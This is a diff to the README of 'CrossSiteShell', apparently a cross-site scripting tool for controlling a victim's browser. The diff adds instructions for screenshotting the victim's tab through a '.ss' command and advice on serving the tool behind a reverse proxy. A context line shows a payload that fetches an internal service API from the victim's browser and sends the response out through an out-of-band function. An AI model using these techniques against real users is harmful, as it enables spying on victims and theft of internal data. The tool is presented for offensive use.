beescuit/crosssiteshell/readme.md

 fetch('https://internalservice/api').then(x => x.text().then(oobsend))
 ```

+### Taking screenshots
+By using the `.ss` command in the console, CrossSiteShell will attempt to take a screenshot of the victims tab.
+This is achieved by importing another library (html2canvas) that converts the HTML/CSS into a canvas and saves it's content as an image.
+The image should be saved to your disk after it gets received.

+### HTTPS
 HTTPS is not supported by default.
 I'd recommend using a reverse proxy such as nginx to redirect traffic to the script.